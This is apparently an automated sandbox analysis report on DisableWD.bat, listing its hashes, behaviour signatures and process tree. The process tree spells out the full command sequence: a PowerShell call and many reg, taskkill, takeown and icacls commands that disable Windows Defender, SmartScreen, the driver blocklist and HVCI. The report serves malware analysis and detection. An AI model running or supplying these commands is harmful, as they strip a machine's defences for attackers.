Analysis

  • max time kernel
    4s
  • max time network
    9s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-02-2024 20:27

General

  • Target

    DisableWD.bat

  • Size

    4KB

  • MD5

    ceff74da4426916b94e3e84128e4330d

  • SHA1

    8030955eef7770ddc988c9c605cff09e2d5fba2f

  • SHA256

    d1e66cf40dac430e08836de4a4408d9b00393b552046fd7a1c697bcb92162121

  • SHA512

    f8e89bf283cd8ab9deeeb091eaf7529cbae12e9e3b07efe6d1f8010569489262dcb4c72fdbbe46f0affd460a9c0a2dd2be6565d88fa34df297718155314111e4

  • SSDEEP

    96:EBXITdcWyWVmWIW+Wn2m9HlMfCcI2B37tmSemS+qaWfmFWryYz8J8wLQLn6FP6Z:97V/9XfjmSzn

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Kills process with taskkill 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\DisableWD.bat"
    1⤵
    • Drops file in System32 directory
    • Suspicious use of WriteProcessMemory
    PID:864
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      PowerShell -NonInteractive -NoLogo -NoProfile -C "Set-MpPreference -DisableRealtimeMonitoring 1"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4800
    • C:\Windows\system32\reg.exe
      reg add "HKLM\SYSTEM\ControlSet001\Services\MsSecCore" /v "Start" /t REG_DWORD /d "4" /f
      2⤵
        PID:2756
      • C:\Windows\system32\reg.exe
        reg add "HKLM\SYSTEM\ControlSet001\Services\MsSecFlt" /v "Start" /t REG_DWORD /d "4" /f
        2⤵
          PID:1936
        • C:\Windows\system32\reg.exe
          reg add "HKLM\SYSTEM\ControlSet001\Services\MsSecWfp" /v "Start" /t REG_DWORD /d "4" /f
          2⤵
            PID:3480
          • C:\Windows\system32\reg.exe
            reg add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
            2⤵
              PID:4480
            • C:\Windows\system32\reg.exe
              reg add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t REG_DWORD /d "4" /f
              2⤵
                PID:2964
              • C:\Windows\system32\reg.exe
                reg add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                2⤵
                  PID:2268
                • C:\Windows\system32\reg.exe
                  reg add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                  2⤵
                    PID:3364
                  • C:\Windows\system32\reg.exe
                    reg add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                    2⤵
                      PID:1420
                    • C:\Windows\system32\reg.exe
                      reg add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                      2⤵
                        PID:4748
                      • C:\Windows\system32\reg.exe
                        reg add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                        2⤵
                        • Modifies security service
                        PID:2956
                      • C:\Windows\system32\reg.exe
                        reg add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t REG_DWORD /d "4" /f
                        2⤵
                        • Modifies security service
                        PID:3472
                      • C:\Windows\system32\reg.exe
                        reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                        2⤵
                          PID:1840
                        • C:\Windows\system32\reg.exe
                          reg add "HKLM\SYSTEM\ControlSet001\Services\SgrmAgent" /v "Start" /t REG_DWORD /d "4" /f
                          2⤵
                            PID:816
                          • C:\Windows\system32\reg.exe
                            reg add "HKLM\SYSTEM\ControlSet001\Services\SgrmBroker" /v "Start" /t REG_DWORD /d "4" /f
                            2⤵
                              PID:1788
                            • C:\Windows\system32\reg.exe
                              reg add "HKLM\SYSTEM\ControlSet001\Services\webthreatdefsvc" /v "Start" /t REG_DWORD /d "4" /f
                              2⤵
                                PID:2692
                              • C:\Windows\system32\reg.exe
                                reg add "HKLM\SYSTEM\ControlSet001\Services\webthreatdefusersvc" /v "Start" /t REG_DWORD /d "4" /f
                                2⤵
                                  PID:1468
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\ControlSet001\Services" /s /k "webthreatdefusersvc" /f 2>nul | find /i "webthreatdefusersvc"
                                  2⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:4484
                                  • C:\Windows\system32\reg.exe
                                    reg query "HKLM\SYSTEM\ControlSet001\Services" /s /k "webthreatdefusersvc" /f
                                    3⤵
                                      PID:4600
                                    • C:\Windows\system32\find.exe
                                      find /i "webthreatdefusersvc"
                                      3⤵
                                        PID:3964
                                    • C:\Windows\system32\taskkill.exe
                                      taskkill /f /im smartscreen.exe
                                      2⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1504
                                    • C:\Windows\system32\takeown.exe
                                      takeown /F "C:\Windows\system32\smartscreen.exe" /A
                                      2⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2532
                                    • C:\Windows\system32\icacls.exe
                                      icacls "C:\Windows\system32\smartscreen.exe" /grant Administrators:F
                                      2⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      PID:2308
                                    • C:\Windows\system32\reg.exe
                                      reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f
                                      2⤵
                                        PID:1344
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\Software\Policies\Microsoft\System" /v "EnableSmartScreen" /t REG_DWORD /d "0" /f
                                        2⤵
                                          PID:2644
                                        • C:\Windows\system32\reg.exe
                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d "0" /f
                                          2⤵
                                            PID:2248
                                          • C:\Windows\system32\reg.exe
                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t REG_DWORD /d "0" /f
                                            2⤵
                                              PID:4388
                                            • C:\Windows\system32\reg.exe
                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SmartScreen" /v "EnableSmartScreen" /t REG_DWORD /d "0" /f
                                              2⤵
                                                PID:1292
                                              • C:\Windows\system32\reg.exe
                                                reg add "HKCU\Software\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f
                                                2⤵
                                                  PID:2712
                                                • C:\Windows\system32\reg.exe
                                                  reg add "HKLM\Software\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f
                                                  2⤵
                                                    PID:3396
                                                  • C:\Windows\system32\reg.exe
                                                    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f
                                                    2⤵
                                                      PID:3304
                                                    • C:\Windows\system32\reg.exe
                                                      reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f
                                                      2⤵
                                                        PID:1644
                                                      • C:\Windows\system32\reg.exe
                                                        reg add "HKLM\SYSTEM\ControlSet001\Control\CI\Policy" /v "VerifiedAndReputablePolicyState" /t REG_DWORD /d "0" /f
                                                        2⤵
                                                          PID:564
                                                        • C:\Windows\system32\reg.exe
                                                          reg add "HKLM\Software\Microsoft\Windows Defender" /v "PUAProtection" /t REG_DWORD /d "0" /f
                                                          2⤵
                                                            PID:1236
                                                          • C:\Windows\system32\reg.exe
                                                            reg add "HKLM\SYSTEM\ControlSet001\Control\CI\Config" /v "VulnerableDriverBlocklistEnable" /t REG_DWORD /d "0" /f
                                                            2⤵
                                                              PID:768
                                                            • C:\Windows\system32\reg.exe
                                                              reg add "HKLM\SYSTEM\ControlSet001\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /t REG_DWORD /d "0" /f
                                                              2⤵
                                                                PID:3436

                                                            Network

                                                            MITRE ATT&CK Enterprise v15

                                                            Replay Monitor

                                                            Loading Replay Monitor...

                                                            Downloads

                                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mxweaili.fws.ps1

                                                              Filesize

                                                              60B

                                                              MD5

                                                              d17fe0a3f47be24a6453e9ef58c94641

                                                              SHA1

                                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                              SHA256

                                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                              SHA512

                                                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                            • memory/4800-9-0x000001FF55660000-0x000001FF55682000-memory.dmp

                                                              Filesize

                                                              136KB

                                                            • memory/4800-10-0x00007FFAD70F0000-0x00007FFAD7BB1000-memory.dmp

                                                              Filesize

                                                              10.8MB

                                                            • memory/4800-12-0x000001FF534B0000-0x000001FF534C0000-memory.dmp

                                                              Filesize

                                                              64KB

                                                            • memory/4800-11-0x000001FF534B0000-0x000001FF534C0000-memory.dmp

                                                              Filesize

                                                              64KB

                                                            • memory/4800-13-0x000001FF534B0000-0x000001FF534C0000-memory.dmp

                                                              Filesize

                                                              64KB

                                                            • memory/4800-16-0x00007FFAD70F0000-0x00007FFAD7BB1000-memory.dmp

                                                              Filesize

                                                              10.8MB